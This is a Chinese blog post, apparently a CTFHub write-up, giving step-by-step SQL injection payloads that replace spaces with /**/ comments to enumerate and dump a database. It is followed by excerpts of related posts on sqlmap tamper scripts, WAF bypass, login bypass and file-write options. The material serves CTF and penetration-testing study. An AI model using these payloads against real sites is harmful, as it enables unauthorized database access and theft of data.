sqlmap使用:过滤空格注入(手注)

已于 2023-08-04 14:45:17 修改
阅读量678 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透 文章标签: 数据库
于 2023-07-21 10:39:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/NSQ0207/article/details/131844964
该文章展示了如何通过SQL注入技术查询数据库信息,包括获取schema_name(数据库名)、table_name(表名)、column_name(字段名)以及查询特定表的内容。这些查询通常用于渗透测试和安全研究。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ctfhub 过滤空格:

3/**/union/**/select/**/1,schema_name/**/from/**/information_schema.schemata


3/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'


3/**/union/**/select/**/1,column_name/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='boabsogxxd'


3/**/union/**/select/**/1,cesxhpqvfe/**/from/**/sqli.boabsogxxd

1.查询数据库

 2.查询表名

 

 3.查询字段名

 

3/**/union/**/select/**/1,column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'sozekgxoan'/**/and/**/table_schema=/**/"sqli"/**/limit/**/0,1

 4.查询字段具体内容

3/**/union/**/select/**/1,group_concat(klrqirnsbo)/**/from/**/sqli.sozekgxoan

sqlmap 注入方式、使用总结
墨痕诉清风的博客
10-04 5812
等级越高,说明探测时使用的payload也越多。当然,等级越高,探测的时间也越慢。id=1" --file- write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt。g=portal&m=page&a=news&id=25*” --current-db --batch #查看当前数据库名称,--batch表示。
使用sqlmap 绕过防火墙进行注入测试
weixin_45116657的博客
11-08 512
前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔...
sqlmap绕过空格过滤方法
qq_45290991的博客
07-17 5745
sqlmap自带的脚本: --tamper "space2comment.py" 补充: 脚本名:space2comment.py 作用:Replaces space character ' ' with comments /**/ 也就是用释/**/替换空格字符' ' sqlmap中的tamper脚本有很多,例如:equaltolike.py(作用是用like代替等号)、apostrophemask.py(作用是用utf8代替引号)、greatest.p...
ctf.show web6 sql注入过滤空格
m0_46412682的博客
07-13 836
ctf.show web6 sql注入过滤空格 开始的页面。是一个登录的页面 随便输入用户名和密码,没有报错之类的,就把账户名和密码都清空了 那就来burpsuit抓包 先用个万能密码 ’ or 1=1 # 这里提示sql注入错误,一般是有过滤,这里过滤空格,绕过空格过滤的可以用 /**/ ,(),`,tab,两个空格 这利我们用/**/代替空格 先判断有多少字段,先用4个测试一下,没有出现欢迎你的字样 那就用三个,测试成功 爆库 username=admin'/**/or/**/1=1/**/u
SQL注入-过滤空格
qq_24899063的博客
11-08 2138
SQL注入-过滤空格
sql注入3之空格过滤
这周末在做梦的博客
10-02 1481
空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式 –tamper “脚本名称”
CTFHUB-SQL注入-过滤空格
weixin_68416970的博客
08-15 345
CTFHUB-SQL注入-过滤空格的过关教程
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6782
SQL注入时,空格使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 释绕过空格 这是最基本的方法,在一些自动化SQL射工具中,使用也十分普遍。在MySQL中,用 /*释*/ 来标记释的内容。比如SQL查询: select user() from dual 我们用释替换空格
CTFHub~SQL注入【MySQL结构+Cookie注入+UA注入+Refer注入+过滤空格
weixin_67832625的博客
08-19 697
本文详细介绍了对后5段sql注入的类型,用最简单的语法和法讲解了每一关的通过
sql注入空格过滤_网站渗透:SQL注入与WAF绕过思路分享
weixin_39657444的博客
11-16 701
一、前言这个注入是之前做测试时发现的,但是测试的时候发现有防护,但是想想这么个小网站都绕不过,实在不应该啊。开始补充学习各种场景、各种waf绕过姿势,勉勉强强的成功执行我构造的SQL的语句。趁着还有些印象,就写下过程当记录吧,本次全程打码,纯技术分享。二、注入发现首先,网页打开是这样的,好熟悉的表单页面,常规测试一下,XSS、SQL注入,XSS我都玩腻了感觉没啥好研究的。随便碰碰运气测下SQL注入...
使用sqlmap绕过过滤
08-05
使用sqlmap进行攻击时,数据库往往会对注入的SQL代码进行过滤,以防止SQL注入攻击。这些过滤包括对特定的SQL关键字、函数名、空格等进行拦截或替换。为了绕过这些过滤sqlmap提供了一组名为tamper脚本的工具,...
sql注入空格过滤_SQL注入:各种绕过检测的姿势
weixin_39874589的博客
11-16 4407
这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...
SQL注入之绕过空格
nihao_ma_的博客
05-07 2423
SQL注入空格绕过技巧
SQL注入空格与逗号过滤的绕过技巧总结
最新发布
HuaweiLab_Peach的博客
03-18 1684
大家好,今天想和大家分享一些实用的技巧,专门针对渗透测试或CTF比赛中可能遇到的特殊字符过滤问题。这篇文章主要讲解当遇到空格和逗号过滤时,如何巧妙地进行绕过,让我们的SQL注入成功执行。
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过
mooyuan的网络安全博客
11-27 1697
打开靶场,url为iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过(1)闭合方式是什么?iwebsec的第7关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第07关卡过滤空格
sql注入空格过滤_CTF小白入门- SQL注入位置发现及绕过
weixin_39945475的博客
11-16 2826
上一篇中介绍了 SQL 注入的各种方式和利用情况。这一篇中介绍注入位置及注入点的发现方法。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づ常见注入点位置及判断方法在CTF比赛中,注入点一般存在一下几个地方。GET中的注入点 一般这种注入点最容易被发现了,可以用sqlmap或者 工验证。POS中的注入点 POST参数中的注入点一...
sql注入过滤处理
富在术数不在劳身,利在势局不在力耕。
07-22 786
/*sql注入操作处理*/         function actionDowithsql($str)         {           $str = str_replace("and","",$str);           $str = str_replace("execute","",$str);           $str = str_replace("update",
sql注入中的过滤问题
csjjjd的博客
01-27 709
在这个语句中,**/被用作释符号,是一种可以跨行释的释符。它将后续的内容都释掉,从而避免了一些输入过滤注入过滤,可以进行SQL注入从而获取数据或进行其他恶意操作。id=1 or 1=1#时提示错误,从这里可以看出对面过滤了点什么导致我的语句出错了,因为我这个语句是用真的,不管放在哪都是会一定正确的,但是这里提示错误的。顺带一提:看来大佬wp后发现其实过滤空格还可以使用()括号来绕过,但是我觉得还是/**/用的习惯,希望本文能够帮助大家。4.直接拿到flag。
SQL注入绕过空格过滤
热门推荐
gam0n的博客
06-05 1万+
一、通过释绕过空格释即/**/通过释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值